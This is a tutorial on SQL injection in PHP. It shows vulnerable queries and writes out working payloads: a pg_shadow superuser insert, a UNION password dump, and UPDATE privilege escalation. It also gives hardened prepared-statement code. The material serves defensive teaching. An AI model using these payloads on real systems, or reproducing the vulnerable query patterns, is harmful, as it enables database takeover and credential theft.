SQL injection manually


Many web developers are unaware of how SQL queries can be tampered with, and assume that an SQL query is a trusted command. In practice, SQL queries built from untrusted input can circumvent access controls, bypassing standard authentication and authorization checks, and sometimes they even allow access to host operating system level commands.

Direct SQL command injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, to override valuable data, or even to execute dangerous system level commands on the database host. This is accomplished by the application taking user input and combining it with static parameters to build an SQL query.

Splitting the result set into pages and making superusers (PostgreSQL)

<?php
$offset = $argv[0]; // beware, no input validation!
$query  = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
$result = pg_query($con, $query); // $con is an existing PostgreSQL connection
?>

Normal users click on the 'next' and 'prev' links, where the $offset is encoded into the URL. The script expects that the incoming $offset is a decimal number. However, what if someone tries to break in by appending a urlencode()'d form of the following to the URL?

0;
insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd)
    select 'crack', usesysid, 't','t','crack'
    from pg_shadow where usename='postgres';


If this happened, the script would hand the attacker superuser access to the database.

Listing out articles and passwords
A common approach to harvesting passwords is to circumvent a search result page. The attacker only needs to check whether any submitted variables are used in SQL statements without proper handling. Such variables are commonly set in a preceding form to customize the WHERE, ORDER BY, LIMIT and OFFSET clauses of a SELECT statement. If your database supports the UNION construct, the attacker may try to append an entire query to the original one.


<?php

// $size comes straight from the request form, without validation
$query  = "SELECT id, name, inserted, size FROM products
           WHERE size = '$size'";
$result = odbc_exec($conn, $query);

?>

The static part of the query can be combined with another SELECT statement that reveals all passwords:


'
union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from usertable;
-- 

If this string (note the opening quote and the trailing -- comment) is assigned to one of the variables used in $query, the query beast awakens: the UNION runs as part of the original statement.
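The pagination and search queries above, rewritten as an added example (not code from the original post) so that user input can never alter the SQL structure. It assumes PDO with an in-memory SQLite database and constructed sample rows so it runs stand-alone; with PostgreSQL the same SQL and parameters would go to pg_query_params() instead.

```php
<?php
// Added example, not from the original post. Hardened versions of the two
// vulnerable queries: the offset is validated as an integer and bound as one,
// and the size filter is bound as a single string value.

function validOffset(string $raw): ?int {
    // A pagination offset must be a plain non-negative integer; anything else
    // (for example "0; insert into pg_shadow ...") is rejected before any SQL runs.
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $n === false ? null : $n;
}

function productsPage(PDO $db, string $rawOffset): array {
    $offset = validOffset($rawOffset);
    if ($offset === null) {
        throw new InvalidArgumentException('offset must be a non-negative integer');
    }
    // LIMIT/OFFSET value is bound as an integer, never interpolated into the string.
    $stmt = $db->prepare('SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET :off');
    $stmt->bindValue(':off', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function productsBySize(PDO $db, string $size): array {
    // The whole of $size is one bound value: a quote, UNION or -- inside it is
    // compared against the size column, not parsed as SQL.
    $stmt = $db->prepare('SELECT id, name, inserted, size FROM products WHERE size = :size');
    $stmt->execute([':size' => $size]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample schema and data (table names follow the post).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (id INTEGER, name TEXT, inserted TEXT, size TEXT)');
$db->exec('CREATE TABLE usertable (uname TEXT, passwd TEXT)');
$db->exec("INSERT INTO products VALUES (1,'bolt','2020-01-01','M6'),(2,'nut','2020-01-02','M6')");
$db->exec("INSERT INTO usertable VALUES ('alice','s3cret')");

// The UNION payload from the post, passed as a bound value: it matches no size,
// so no usertable row is returned. The injected offset is rejected outright.
$payload = "' union select '1', uname||'-'||passwd, '1971-01-01', '0' from usertable; -- ";
var_dump(count(productsBySize($db, 'M6')));
var_dump(count(productsBySize($db, $payload)));
var_dump(validOffset('0; insert into pg_shadow ...'));
var_dump(count(productsPage($db, '0')));
```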

From resetting a password to gaining more privileges

<?php
// both $pwd and $uid come unvalidated from the request
$query = "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";
?>

But a malicious user submits the value ' or uid like'%admin% to $uid to change the admin's password, or simply sets $pwd to 123145', trusted=100, admin='yes to gain more privileges. The query then becomes:


<?php

// $uid: ' or uid like '%admin%
$query = "UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%';";

// $pwd: 123145', trusted=100, admin='yes
$query = "UPDATE usertable SET pwd='123145', trusted=100, admin='yes' WHERE
...;";

?>

Attacking the database operating system (MSSQL)

<?php

// $prod comes unvalidated from the request
$query  = "SELECT * FROM products WHERE id LIKE '%$prod%'";
$result = mssql_query($query);

?>

MSSQL Server executes every SQL statement in a batch, so an injected batch can include a command that adds a new user to the local accounts database. If this application were running as sa and the MSSQLSERVER service were running with sufficient privileges, the attacker would now have an account with which to access this machine.
